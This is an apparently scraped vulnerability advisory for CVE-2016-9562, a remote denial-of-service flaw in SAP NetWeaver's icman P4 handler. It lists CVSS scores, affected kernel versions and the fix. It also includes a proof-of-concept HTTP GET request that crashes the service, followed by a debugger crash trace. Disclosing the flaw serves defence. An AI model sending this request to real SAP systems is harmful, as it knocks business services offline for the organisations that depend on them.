7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.004 Low
EPSS
Percentile
71.5%
Application: SAP NetWeaver AS JAVA **Versions Affected:**SAP NetWeaver AS JAVA 7.4 **Vendor URL: **SAP **Bugs: **Denial of Service **Reported: **22.04.2016 **Vendor response: **23.04.2016 **Date of Public Advisory:**09.08.2016 **Reference: **SAP Security Note 2313835 **Author: ** Vahagn Vardanyan (ERPScan)
Class: Denial of Service
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE: CVE-2016-9562
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unhanged (U) |
C: Impact to Confidentiality | None (N) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | High (H) |
Anonymous attacker can use a special HTTP request to perform a DoS attack against SAP icman.
An attacker can use a Denial of Service vulnerability to terminate a process of a vulnerable component. For this period of time, nobody can use this service, which negatively affects business processes, system downtime and, as a result, business reputation.
SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE
To correct this vulnerability, install SAP Security Note 2313835.
Vulnerability triggers when one sends HTTPS GET request to SAP NetWeaver P4.
PoC GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1 Host: 172.16.10.65:50005 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close
0:007> r rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0 rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000 rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40 r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20 r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000 r14=0000000000000000 r15=0000000000000001 iopl=0 nv up ei ng nz ac po cy cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297 icman!P4PlugInReadHandler+0xb9: 00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4] ds:00000000`00000004=???????? 00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9 [d:\depot\bas\742_rel\src\krn\si\ic\p4_plg.c @ 1192] 00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 5088] 00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 4808] 00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 3840] 00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43 00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf 00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd 00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
PoC
GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1
Host: 172.16.10.65:50005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
0:007> r
rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0
rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000
rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40
r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20
r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000
r14=0000000000000000 r15=0000000000000001
iopl=0 nv up ei ng nz ac po cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
icman!P4PlugInReadHandler+0xb9:
00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4] ds:00000000`00000004=????????
00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9 [d:\depot\bas\742_rel\src\krn\si\ic\p4_plg.c @ 1192]
00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 5088]
00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 4808]
00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 3840]
00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43
00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf
00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd
00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21
—|—
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.004 Low
EPSS
Percentile
71.5%